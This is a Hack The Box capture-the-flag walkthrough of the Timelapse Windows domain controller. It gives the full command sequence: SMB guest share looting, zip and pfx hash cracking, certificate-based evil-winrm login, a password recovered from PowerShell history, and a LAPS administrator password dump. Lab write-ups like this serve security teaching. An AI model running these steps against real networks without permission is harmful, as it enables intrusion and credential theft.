Hack The Box - Timelapse Walkthrough
Welcome back! Today we are going to solve the Timelapse machine from Hack The Box. Timelapse is an easy box which focuses on accesible SMB shares and a lot of hash cracking to get the initial foothold. We then find configuration files that allow us to login to the system as the administrator user.
Foothold
Let's start off with a basic nmap scan. We use -Pn to skip host discovery, -sC to enumerate services, -sV to enumerate service versions and -oN to write to Nmap readable format.
1nmap -Pn -sC -sV -oN nmap/initial timelapse.htb
Which shows us the following results:
1PORT STATE SERVICE VERSION
253/tcp open domain Simple DNS Plus
388/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-01 16:07:20Z)
4135/tcp open msrpc Microsoft Windows RPC
5139/tcp open netbios-ssn Microsoft Windows netbios-ssn
6389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
7445/tcp open microsoft-ds?
8464/tcp open kpasswd5?
9593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
10636/tcp open ldapssl?
11Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
12
13Host script results:
14|_clock-skew: 8h00m06s
15| smb2-security-mode:
16| 2.02:
17|_ Message signing enabled and required
18| smb2-time:
19| date: 2022-04-01T16:07:28
20|_ start_date: N/A
We find the domain (timelapse.htb) and the host (DC01). We also see that DNS, Kerberos, LDAP and LDAPSSL are open, which also indicates that we are dealing with a domain controller. Before we dig into the results and start enumerating, we first start a more elaborate background port scan on all ports using -p- flag to specify all ports.
1nmap -Pn -sC -sV -p- -oN nmap/all_ports timelapse.htb
Let's start off by enumerating RPC using rpcdump.py.
1rpcdump.py timelapse.htb
RPCDump found 398 endpoints, however no useful information to obtain a foothold onto the system was found. We continue with SMB. We run nulllinux.py to see if we can find any interesting information over port 139/445.
1python3 nullinux/nullinux.py timelapse.htb
But again, no luck, as we receive an "access denied" on most checks. All we find is a domain name "TIMELAPSE" and a domain SID "S-1-5-21-671920749-559770252-3318990721".
We try to enumerate users through nmap's krb5-enum-users script, since we know the domain:
1nmap -Pn --script krb5-enum-users --script-args krb5-enum-users.realm="timelapse" -p 88 timelapse.htb
Which shows us the guest and administrator users.
1PORT STATE SERVICE
288/tcp open kerberos-sec
3| krb5-enum-users:
4| Discovered Kerberos principals
5| guest@timelapse
6|_ administrator@timelapse
Which isn't of much use for us.
Next, we try to connect with LDAP to try and extract data. For this we write a simple python3 script to try and connect to LDAPS with the following syntax:
1import ldap3
2server = ldap3.Server("timelapse.htb", get_info = ldap3.ALL, port = 636, use_ssl = True)
3connection = ldap3.Connection(server)
4connection.bind()
5server.info
Which returns a "Connection reset by peer" error, meaning we can't connect to LDAP without authentication.
Let's try to enumerate SMB now, using guest access. To do this, we specify the % sign as the username.
1smbmap -H timelapse.htb -u %
Which returns several default shares, but one interesting read only share named "Shares":
1[+] Guest session IP: timelapse.htb:445 Name: unknown
2 Disk Permissions
3 ---- -----------
4 ADMIN$ NO ACCESS
5 C$ NO ACCESS
6 IPC$ READ ONLY
7 NETLOGON NO ACCESS
8 Shares READ ONLY
9 SYSVOL NO ACCESS
We connect to the share using smbclient, and download all files that are available to us:
1smbclient //timelapse.htb/Shares -U -I timelapse.htb
2>> recurse ON
3>> prompt OFF
4>> mget *
In the /dev/ share we find a winrm_backup.zip that is password protected. We use zip2john to translate the zip file to a hash so that we can use john to crack it.
1zip2john winrm_backup.zip > hash
2
3john --wordlist=/usr/share/wordlists/rockyou.txt hash
We manage to crack the password, and manage to extract a .pfx file. This .pfx file is also password protected, so we use pfx2john to translate the file to a hash so we can crack it.
1pfx2john legacyy_dev_auth.pfx > pfx_hash
2
3john --wordlist=/usr/share/wordlists/rockyou.txt pfx_hash
After two minutes we managed to crack the pfx file and obtain the password. We double click the .pfx file and find the "identity:Legacyy" entry, indicating that legacyy could be a potential username.
We use openssl to extract the private key from the .pfx file.
1openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key
We now have an encrypted private key. We decrypt it using the following command:
1openssl rsa -in private.key -out decrypted_private.key
We use openssl to extract the certificate from the .pfx file:
1# extract encrypted .crt file
2openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
3
4# extract decrypted .cer file
5openssl x509 -inform pem -in cert.crt -outform der -out cert.cer
We now have a potential username (legacyy) and a decrypted certificate and private key. We use evil-winrm to connect to the box.
1evil-winrm -i timelapse.htb -k decrypted_private.key -c cert.cer -S
We navigate to the desktop and find user.txt
1*Evil-WinRM* PS C:\Users\legacyy\Desktop> dir
2
3
4 Directory: C:\Users\legacyy\Desktop
5
6
7Mode LastWriteTime Length Name
8---- ------------- ------ ----
9-ar--- 4/1/2022 9:04 AM 34 user.txt
10
11
12*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami
13timelapse\legacyy
Privilege Escalation
We upload Winpeas and run it. Winpeas shows us that our user has a powershell history file located under "C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt", which contains the following information
1whoami
2ipconfig /all
3netstat -ano |select-string LIST
4$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
5$p = ConvertTo-SecureString '[...REDACTED...]' -AsPlainText -Force
6$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
7invoke-command -computername localhost -credential $c -port 5986 -usessl -
8SessionOption $so -scriptblock {whoami}
9get-aduser -filter * -properties *
10exit
We use evil-winrm to setup another session with the new credentials that we found. As the password contains a $, we have to escape it using the \ character before logging in.
1evil-winrm -i timelapse.htb -u "svc_deploy" -p "xxR\$Q62^12xxxxKWaxxxV" -P 5986 -S
We navigate through the filesystem, and find that LAPS is installed. Knowing this, we look for a simple powershell script to look for credentials. For this we use the following script:
1$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
2$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
We run the script and find administrator credentials:
1.\password_dump.ps1
2
3
4Name DnsHostName ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime
5---- ----------- ------------- ---------------------------
6WEB01
7DEV01
8DB01
9DC01 dc01.timelapse.htb [...REDACTED...] 132937346648463515
We use these credentials to logon the box as the administrator user through evil-winrm, and find the root.txt and thereby complete the box.
1*Evil-WinRM* PS C:\Users\TRX> whoami
2timelapse\administrator
3*Evil-WinRM* PS C:\Users\TRX> dir Desktop
4
5
6 Directory: C:\Users\TRX\Desktop
7
8
9Mode LastWriteTime Length Name
10---- ------------- ------ ----
11-ar--- 4/1/2022 9:04 AM 34 root.txt
I hope this walkthrough has been useful to you and taught you a thing or two. Thanks for reading, and see you in my next walkthrough!